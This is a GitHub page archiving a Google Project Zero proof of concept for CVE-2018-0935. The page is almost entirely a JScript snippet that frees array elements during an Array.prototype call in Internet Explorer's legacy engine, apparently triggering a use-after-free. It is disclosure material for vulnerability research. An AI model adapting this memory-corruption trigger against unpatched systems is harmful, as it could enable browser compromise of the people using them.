Skip to content

Latest commit

 

History

History
54 lines (42 loc) · 1.11 KB

CVE-2018-0935.md

File metadata and controls

54 lines (42 loc) · 1.11 KB
Raw

CVE-2018-0935

  • Report: Jan 2018
  • Fix: April 2018
  • Credit: ifratric of Google Project Zero

PoC

<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<script language="Jscript.Encode">

var vars = {};

function f() {
  alert('in f');
  for(var i=0; i<40000; i++) {
    vars[i] = 1;
  }
  vars.length = 0;
  CollectGarbage();
  alert(this);
}

for(var i=0; i<20000; i++) {
  vars[i] = [];
}
vars.length = [];
for(var i=20000; i<40000; i++) {
  vars[i] = [];
}

vars.length.toString = f;

// all of these work, just uncomment the one you want to test
//Array.prototype.join.call(vars);
//Array.prototype.reverse.call(vars);
//Array.prototype.sort.call(vars);
//Array.prototype.pop.call(vars);
//Array.prototype.push.call(vars, 1);
//Array.prototype.shift.call(vars);
//Array.prototype.unshift.call(vars, 1);
//Array.prototype.slice.call(vars, 1);
Array.prototype.splice.call(vars, 1, 1);

alert('failed');

</script>

Reference